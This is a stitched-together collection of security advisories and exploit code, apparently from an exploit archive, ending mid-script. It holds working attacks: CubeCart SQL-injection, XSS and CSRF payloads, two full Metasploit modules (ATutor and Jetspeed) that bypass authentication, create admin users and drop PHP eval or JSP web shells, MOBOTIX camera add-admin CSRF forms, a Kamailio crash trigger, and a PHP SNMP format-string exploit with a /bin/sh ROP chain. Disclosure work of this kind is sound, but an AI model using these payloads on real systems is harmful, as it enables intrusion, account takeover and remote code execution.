CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users.
1) SQL Injection in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied data passed via "char" HTTP GET parameter to "/admin.php" PHP script. A remote authenticated attacker with privileges to view list of products can alter present SQL query, inject and execute arbitrary SQL commands in the application's database. This vulnerability can be also exploited by anonymous attacker via CSRF vector.
A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has writing permissions to this directory), which can execute phpinfo() function:
<img src="http://[host]/admin.php?_g=products&cat_id=1&sort[updated]=DESC&cha
r=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUT
FILE%20'/var/www/site/file.php'%20--%202">
2) Stored Cross-Site Scripting in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default.
Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator just visits "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against.
To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile:
<form action="http://[host]/index.php?_a=profile" method="POST" name="f1">
<input type="hidden" name="title" value="title" />
<input type="hidden" name="first_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="last_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="email" value="mail (at) mail (dot) com [email concealed]" />
<input type="hidden" name="phone" value="1234567" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="passold" value="" />
<input type="hidden" name="passnew" value="" />
<input type="hidden" name="passconf" value="" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Submit request" />
</form><script>document.f1.submit();</script>
A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page:
http://[host]/admin.php?_g=customers
3) Cross-Site Request Forgery in CubeCart
The vulnerability exists due to insufficient validation of HTTP request origin, when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and delete arbitrary file on the system.
A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below:
http://[host]/admin.php?_g=maintenance&node=index&delete=../index.php
------------------------------------------------------------------------
-----------------------
Solution:
Update to CubeCart 6.0.11
More Information:
https://forums.cubecart.com/topic/51079-cubecart-6011-released/
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ATutor 2.2.1 Directory Traversal / Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP
setup with display_errors set to On, which can be used to allow us to upload a malicious
ZIP file. On the web application, a blacklist verification is performed before extraction,
however it is not sufficient to prevent exploitation.
You are required to login to the target to reach the vulnerability, however this can be
done as a student account and remote registration is enabled by default.
Just in case remote registration isn't enabled, this module uses 2 vulnerabilities
in order to bypass the authentication:
1. confirm.php Authentication Bypass Type Juggling vulnerability
2. password_reminder.php Remote Password Reset TOCTOU vulnerability
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
],
'References' =>
[
[ 'URL', 'http://www.atutor.ca/' ], # Official Website
[ 'URL', 'http://sourceincite.com/research/src-2016-09/' ], # Type Juggling Advisory
[ 'URL', 'http://sourceincite.com/research/src-2016-10/' ], # TOCTOU Advisory
[ 'URL', 'http://sourceincite.com/research/src-2016-11/' ], # Directory Traversal Advisory
[ 'URL', 'https://github.com/atutor/ATutor/pull/107' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 1 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [false, 'The username to authenticate as']),
OptString.new('PASSWORD', [false, 'The password to authenticate with'])
],self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
# there is no real way to finger print the target so we just
# check if we can upload a zip and extract it into the web root...
# obviously not ideal, but if anyone knows better, feel free to change
if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?)
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true)
if student_cookie != nil && disclose_web_root
begin
if upload_shell(student_cookie, check=true) && found
return Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
end
else
# if we cant login, it may still be vuln
return Exploit::CheckCode::Unknown
end
else
# if no creds are supplied, it may still be vuln
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def create_zip_file(check=false)
zip_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@payload_name = Rex::Text.rand_text_alpha_lower(4)
@archive_name = Rex::Text.rand_text_alpha_lower(3)
@test_string = Rex::Text.rand_text_alpha_lower(8)
# we traverse back into the webroot mods/ directory (since it will be writable)
path = "../../../../../../../../../../../../..#{@webroot}mods/"
# we use this to give us the best chance of success. If a webserver has htaccess override enabled
# we will win. If not, we may still win because these file extensions are often registered as php
# with the webserver, thus allowing us remote code execution.
if check
zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}")
else
register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml")
zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht")
zip_file.add_file("#{path}#{@payload_name}.pht", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.add_file("#{path}#{@payload_name}.php4", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.add_file("#{path}#{@payload_name}.phtml", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
end
zip_file.pack
end
def found
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
})
if res and res.code == 200 and res.body =~ /#{@test_string}/
return true
end
return false
end
def disclose_web_root
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
})
@webroot = "/"
@webroot << $1 if res and res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
if @webroot != "/"
return true
end
return false
end
def call_php(ext)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
return res
end
def exec_code
res = nil
res = call_php("pht")
if res == nil
res = call_php("phtml")
end
if res == nil
res = call_php("php4")
end
end
def upload_shell(cookie, check)
post_data = Rex::MIME::Message.new
post_data.add_part(create_zip_file(check), 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{@archive_name}.zip\"")
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"submit_import\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "tests", "question_import.php"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'vars_get' => {
'h' => ''
}
})
if res && res.code == 302 && res.redirection.to_s.include?("question_db.php")
return true
end
# unknown failure...
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
def find_user(cookie)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "users", "profile.php"),
'cookie' => cookie,
# we need to set the agent to the same value that was in type_juggle,
# since the bypassed session is linked to the user-agent. We can then
# use that session to leak the username
'agent' => ''
})
username = "#{$1}" if res and res.body =~ /<span id="login">(.*)<\/span>/
if username
return username
end
# else we fail, because we dont know the username to login as
fail_with(Failure::Unknown, "Unable to find the username!")
end
def type_juggle
# high padding, means higher success rate
# also, we use numbers, so we can count requests :p
for i in 1..8
for @number in ('0'*i..'9'*i)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "confirm.php"),
'vars_post' => {
'auto_login' => '',
'code' => '0' # type juggling
},
'vars_get' => {
'e' => @number, # the bruteforce
'id' => '',
'm' => '',
# the default install script creates a member
# so we know for sure, that it will be 1
'member_id' => '1'
},
# need to set the agent, since we are creating x number of sessions
# and then using that session to get leak the username
'agent' => ''
}, redirect_depth = 0) # to validate a successful bypass
if res and res.code == 302
cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
return cookie
end
end
end
# if we finish the loop and have no sauce, we cant make pasta
fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
end
def reset_password
# this is due to line 79 of password_reminder.php
days = (Time.now.to_i/60/60/24)
# make a semi strong password, we have to encourage security now :->
pass = Rex::Text.rand_text_alpha(32)
hash = Rex::Text.sha1(pass)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "password_reminder.php"),
'vars_post' => {
'form_change' => 'true',
# the default install script creates a member
# so we know for sure, that it will be 1
'id' => '1',
'g' => days + 1, # needs to be > the number of days since epoch
'h' => '', # not even checked!
'form_password_hidden' => hash, # remotely reset the password
'submit' => 'Submit'
},
}, redirect_depth = 0) # to validate a successful bypass
if res and res.code == 302
return pass
end
# if we land here, the TOCTOU failed us
fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
end
def login(username, password, check=false)
hash = Rex::Text.sha1(Rex::Text.sha1(password))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => hash,
'form_login' => username,
'submit' => 'Login',
'token' => '',
},
})
# poor php developer practices
cookie = "ATutorID=#{$4};" if res && res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
return cookie
end
end
# auth failed if we land here, bail
unless check
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
end
return nil
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
# login if needed
if (not datastore['USERNAME'].empty? and not datastore['PASSWORD'].empty?)
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
print_good("Logged in as #{datastore['USERNAME']}")
# else, we reset the students password via a type juggle vulnerability
else
print_status("Account details are not set, bypassing authentication...")
print_status("Triggering type juggle attack...")
student_cookie = type_juggle
print_good("Successfully bypassed the authentication in #{@number} requests !")
username = find_user(student_cookie)
print_good("Found the username: #{username} !")
password = reset_password
print_good("Successfully reset the #{username}'s account password to #{password} !")
report_cred(user: username, password: password)
student_cookie = login(username, password)
print_good("Logged in as #{username}")
end
if disclose_web_root
print_good("Found the webroot")
# we got everything. Now onto pwnage
if upload_shell(student_cookie, false)
print_good("Zip upload successful !")
exec_code
end
end
end
end
=begin
php.ini settings:
display_errors = On
=end
census ID: census-2016-0009
CVE ID: CVE-2016-2385
Affected Products: Kamailio 4.3.4 (and possibly previous versions)
Class: Heap-based Buffer Overflow (CWE-122)
Remote: Yes
Discovered by: Stelios Tsampas
Kamailio (successor of former OpenSER and SER) is an Open Source SIP Server released under GPL, able to handle thousands of call setups per second. Kamailio can be used to build large platforms for VoIP and realtime communications, presence, WebRTC, Instant messaging and other applications. It can also easily be applied to scaling up SIP-to-PSTN gateways, PBX systems or media servers.
There is a (remotely exploitable) heap overflow vulnerability in Kamailio version 4.3.4 and possibly in previous versions. The vulnerability takes place in the SEAS module, which enables Kamailio to transfer the execution logic control of a SIP message to a given external entity, called the Application Server.
Details
The heap overflow can be triggered if Kamailio is configured to use the SEAS module, more specifically if Kamailio calls the module’s single exported function as_relay_t(). The heap overflow is located in function encode_msg(), file encode_msg.c, line 269:
int encode_msg(struct sip_msg *msg, char *payload,int len)
{
...
/*now we copy the actual message after the headers-meta-section*/
memcpy(&payload[j],msg->buf,msg->len);
LM_DBG("msglen = %d,msg starts at %d\n",msg->len,j);
j=htons(j);
...
}
msg is a pointer to a sip_msg structure and it is basically the current SIP packet being processed by Kamailio. msg->buf is a buffer which holds the packet's contents and msg->len is the packet's length. Unsurprisingly, msg->len can take arbitrary values (bound by the packet size) while j takes the value of 180 in most cases.
The destination buffer payload is allocated in encoded_msg()'s caller function, create_as_event_t(), specifically in file seas.c, line 442:
char * create_as_event_t(struct cell *t, struct sip_msg *msg, char processor_id,
int *evt_len, int flags)
{
...
if(!(buffer=shm_malloc(ENCODED_MSG_SIZE))){
LM_ERR("Out Of Memory !!\n");
return 0;
}
...
if(encode_msg(msg,buffer+k,ENCODED_MSG_SIZE-k)<0){
LM_ERR("Unable to encode msg\n");
goto error;
}
...
}
Preprocessor constant ENCODE_MSG_SIZE is defined as 3200 and variable k at line 521 holds the value 34. The problem is that the program does not check the packet's length if it is larger than the destination buffer. If a user makes a request with a large enough packet then the buffer will overflow.
Discussion
We were able to trigger the bug remotely using a large UDP packet.
A proof-of-concept packet is provided below that crashes the Kamailio process handling the request. From bash the packet can be sent using the following command:
cat seas-trigger.packet > /dev/udp/KAMAILIO-IP/KAMAILIO-PORT
This bug may potentially provide attackers with remote code execution capabilities.
Recommendation
The security defect has been fixed in version 4.3.5 of Kamailio. Upgrading to the latest stable version is strongly advised.
Disclosure Timeline
Vendor Contact: February 12th, 2016
CVE assignment: February 15th, 2016
Vendor Patch Release: March 3rd, 2016
Public Advisory: March 30th, 2016
Proof of Concept:
https://census-labs.com/media/seas-trigger.packet
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39638.zip
Source: https://github.com/NorthBit/Metaphor
Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.
Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf
Twitter: https://twitter.com/High_Byte
Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.
The exploit generator is written in Python and used by the PHP code.
usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...
positional arguments:
{leak,rce,suicide} Type of exploit to generate
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Override exploit configuration
-o OUTPUT, --output OUTPUT
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39640.zip
<!--
MOBOTIX Video Security Cameras CSRF Add Admin Exploit
Vendor: MOBOTIX AG
Product web page: https://www.mobotix.com
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
[Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
[Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
[Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50
Summary: MOBOTIX is a German System Manufacturer of Professional Video
Management (VMS) and Smart IP Cameras. These cameras support all standard
features of MOBOTIX IP cameras like automatic object detection, messaging
via network and onboard or network recording. The dual lens thermal system
supports additionally a second optical video sensor with 6-megapixel resolution.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.37.6+
thttpd/2.19-MX
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5312
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php
25.02.2016
-->
Add admin user Testingus:
-------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/access" method="POST">
<input type="hidden" name="user_name_0" value="admin" />
<input type="hidden" name="user_group_0" value="admins" />
<input type="hidden" name="user_passwd_a_0" value="***" />
<input type="hidden" name="user_passwd_b_0" value="***" />
<input type="hidden" name="user_name_2" value="Testingus" />
<input type="hidden" name="user_group_1" value="admins" />
<input type="hidden" name="user_passwd_a_2" value="l33tp4ss" />
<input type="hidden" name="user_passwd_b_2" value="l33tp4ss" />
<input type="hidden" name="sv_passwd_a" value="" />
<input type="hidden" name="sv_passwd_b" value="" />
<input type="hidden" name="super_pin_1" value="" />
<input type="hidden" name="super_pin_2" value="" />
<input type="hidden" name="save_config" value="Set" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add group 'users' to admin area:
--------------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/acl" method="POST">
<input type="hidden" name="group_allow_guest_global" value="on" />
<input type="hidden" name="group_allow_live_global" value="on" />
<input type="hidden" name="group_allow_player_global" value="on" />
<input type="hidden" name="group_allow_multiview_global" value="on" />
<input type="hidden" name="group_allow_pda_global" value="on" />
<input type="hidden" name="group_allow_mxcc_global" value="on" />
<input type="hidden" name="group_allow_info_global" value="on" />
<input type="hidden" name="group_allow_imagelink_global" value="on" />
<input type="hidden" name="group_allow_api_global" value="on" />
<input type="hidden" name="group_allow_image_setup_0" value="on" />
<input type="hidden" name="group_allow_event_setup_0" value="on" />
<input type="hidden" name="group_name_1" value="guests" />
<input type="hidden" name="group_name_2" value="users" />
<input type="hidden" name="group_allow_admin_2" value="on" />
<input type="hidden" name="group_allow_image_setup_2" value="on" />
<input type="hidden" name="group_allow_event_setup_2" value="on" />
<input type="hidden" name="new_group" value="" />
<input type="hidden" name="save_config" value="Set" />
<input type="hidden" name="more_or_less" value="less" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Severity: Moderate
Vendor: The Apache Software Foundation
Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0
Description:
The Import/Export System Backups functionality in the OpenMeetings
Administration menu (http://domain:5080/openmeetings/#admin/backup) is vulnerable to path
traversal via specially crafted file names within ZIP archives.
By uploading an archive containing a file named ../../../public/hello.txt will write
the file "hello.txt" to the http://domain:5080/openmeetings/public/ directory. This could
be used to, for example, overwrite the /usr/bin/convert file (or any other 3 rd party
integrated executable) with a shell script, which would be executed the next time an image
file is uploaded and imagemagick is invoked.
All users are recommended to upgrade to Apache OpenMeetings 3.1.1
Credit: This issue was identified by Andreas Lindh
Apache OpenMeetings Team
--
WBR
Maxim aka solomax
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Jetspeed Arbitrary File Upload',
'Description' => %q{
This module exploits the unsecured User Manager REST API and a ZIP file
path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier
versions, to upload and execute a shell.
Note: this exploit will create, use, and then delete a new admin user.
Warning: in testing, exploiting the file upload clobbered the web
interface beyond repair. No workaround has been found yet. Use this
module at your own risk. No check will be implemented.
},
'Author' => [
'Andreas Lindh', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['CVE', '2016-0710'],
['CVE', '2016-0709'],
['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
],
'DisclosureDate' => 'Mar 6 2016',
'License' => MSF_LICENSE,
'Platform' => ['linux', 'win'],
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],
['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8080)
])
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_warning(msg='')
super("#{peer} - #{msg}")
end
def exploit
print_status("Creating admin user: #{username}:#{password}")
create_admin_user
# This was originally a typo... but we're having so much fun!
print_status('Kenny Loggins in')
kenny_loggins
print_warning('You have entered the Danger Zone')
print_status("Uploading payload ZIP: #{zip_filename}")
upload_payload_zip
print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
exec_jsp_shell
end
def cleanup
print_status("Deleting user: #{username}")
delete_user
super
end
#
# Exploit methods
#
def create_admin_user
send_request_cgi(
'method' => 'POST',
'uri' => '/jetspeed/services/usermanager/users',
'vars_post' => {
'name' => username,
'password' => password,
'password_confirm' => password
}
)
send_request_cgi(
'method' => 'POST',
'uri' => "/jetspeed/services/usermanager/users/#{username}",
'vars_post' => {
'user_enabled' => 'true',
'roles' => 'admin'
}
)
end
def kenny_loggins
res = send_request_cgi(
'method' => 'GET',
'uri' => '/jetspeed/login/redirector'
)
res = send_request_cgi!(
'method' => 'POST',
'uri' => '/jetspeed/login/j_security_check',
'cookie' => res.get_cookies,
'vars_post' => {
'j_username' => username,
'j_password' => password
}
)
@cookie = res.get_cookies
end
# Let's pretend we're mechanize
def import_file
res = send_request_cgi(
'method' => 'GET',
'uri' => '/jetspeed/portal/Administrative/site.psml',
'cookie' => @cookie
)
html = res.get_html_document
import_export = html.at('//a[*//text() = "Import/Export"]/@href')
res = send_request_cgi!(
'method' => 'POST',
'uri' => import_export,
'cookie' => @cookie
)
html = res.get_html_document
html.at('//form[*//text() = "Import File"]/@action')
end
def upload_payload_zip
zip = Rex::Zip::Archive.new
zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)
mime = Rex::MIME::Message.new
mime.add_part(zip.pack, 'application/zip', 'binary',
%Q{form-data; name="fileInput"; filename="#{zip_filename}"})
mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')
case target['Platform']
when 'linux'
register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
when 'win'
register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
end
send_request_cgi(
'method' => 'POST',
'uri' => import_file,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'cookie' => @cookie,
'data' => mime.to_s
)
end
def exec_jsp_shell
send_request_cgi(
'method' => 'GET',
'uri' => "/jetspeed/#{jsp_filename}",
'cookie' => @cookie
)
end
#
# Cleanup methods
#
def delete_user
send_request_cgi(
'method' => 'DELETE',
'uri' => "/jetspeed/services/usermanager/users/#{username}"
)
end
# XXX: This is a hack because FileDropper doesn't delete directories
def on_new_session(session)
super
case target['Platform']
when 'linux'
print_status("Deleting user temp directory: ../temp/#{username}")
session.shell_command_token("rm -rf ../temp/#{username}")
when 'win'
print_status("Deleting user temp directory: ..\\temp\\#{username}")
session.shell_command_token("rd /s /q ..\\temp\\#{username}")
end
end
#
# Utility methods
#
def username
@username ||= Rex::Text.rand_text_alpha_lower(8)
end
def password
@password ||= Rex::Text.rand_text_alphanumeric(8)
end
def jsp_filename
@jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
end
def zip_filename
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
end
end
<?php
// PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit)
// By Andrew Kramer <andrew at jmpesp dot org>
// Should bypass ASLR/NX just fine
// This exploit utilizes PHP's internal "%Z" (zval)
// format specifier in order to achieve code-execution.
// We fake an object-type zval in memory and then bounce
// through it carefully. First though, we use the same
// bug to leak a pointer to the string itself. We can
// then edit the global variable with correct pointers
// before hitting it a second time to get EIP. This
// makes it super reliable! Like... 100%.
// To my knowledge this hasn't really been done before, but
// credit to Stefan Esser (@i0n1c) for the original idea. It works!
// https://twitter.com/i0n1c/status/664706994478161920
// All the ROP gadgets are from a binary I compiled myself.
// If you want to use this yourself, you'll probably need
// to build a new ROP chain and find new stack pivots for
// whatever binary you're targeting. If you just want to get
// EIP, change $stack_pivot_1 to 0x41414141 below.
// pass-by-reference here so we keep things tidy
function trigger(&$format_string) {
$session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public");
// you MUST set exceptions_enabled in order to trigger this
$session->exceptions_enabled = SNMP::ERRNO_ANY;
try {
$session->get($format_string);
} catch (SNMPException $e) {
return $e->getMessage();
}
}
// overwrite either $payload_{1,2} with $str at $offset
function overwrite($which, $str, $offset) {
// these need to be global so PHP doesn't just copy them
global $payload_1, $payload_2;
// we MUST copy byte-by-byte so PHP doesn't realloc
for($c=0; $c<strlen($str); $c++) {
switch($which) {
case 1:
$payload_1[$offset + $c] = $str[$c];
break;
case 2:
$payload_2[$offset + $c] = $str[$c];
break;
}
}
}
echo "> Setting up payloads\n";
//$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit
$stack_pivot_1 = pack("L", 0x0807c19f); // xchg esp ebx
$stack_pivot_2 = pack("L", 0x0809740e); // add esp, 0x14
// this is used at first to leak the pointer to $payload_1
$leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t";
$trampoline_offset = strlen($leak_str);
// used to leak a pointer and also to store ROP chain
$payload_1 =
$leak_str . // leak a pointer
"XXXX" . // will be overwritten later
$stack_pivot_1 . // initial EIP (rop start)
// ROP: execve('/bin/sh',0,0)
pack("L", 0x080f0bb7) . // xor ecx, ecx; mov eax, ecx
pack("L", 0x0814491f) . // xchg edx, eax
pack("L", 0x0806266d) . // pop ebx
pack("L", 0x084891fd) . // pointer to /bin/sh
pack("L", 0x0807114c) . // pop eax
pack("L", 0xfffffff5) . // -11
pack("L", 0x081818de) . // neg eax
pack("L", 0x081b5faa); // int 0x80
// used to trigger the exploit once we've patched everything
$payload_2 =
"XXXX" . // will be overwritten later
"XXXX" . // just padding, whatevs
"\x08X" . // zval type OBJECT
str_repeat("%d", 13) . "%Z"; // trigger the exploit
// leak a pointer
echo "> Attempting to leak a pointer\n";
$data = trigger($payload_1);
$trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset;
echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n";
// If there are any null bytes or percent signs in the pointer, it will break
// the -0x10 will be applied later, so do it now too
if(strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false
|| strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) {
echo "> That pointer has a bad character in it\n";
echo "> This won't work. Bailing out... :(\n";
exit(0);
}
echo "> Overwriting payload with calculated offsets\n";
// prepare the trampoline
// code looks kinda like...
// mov eax, [eax+0x10]
// mov eax, [eax+0x54]
// call eax
overwrite(2, pack("L", $trampoline_ptr - 0x10), 0);
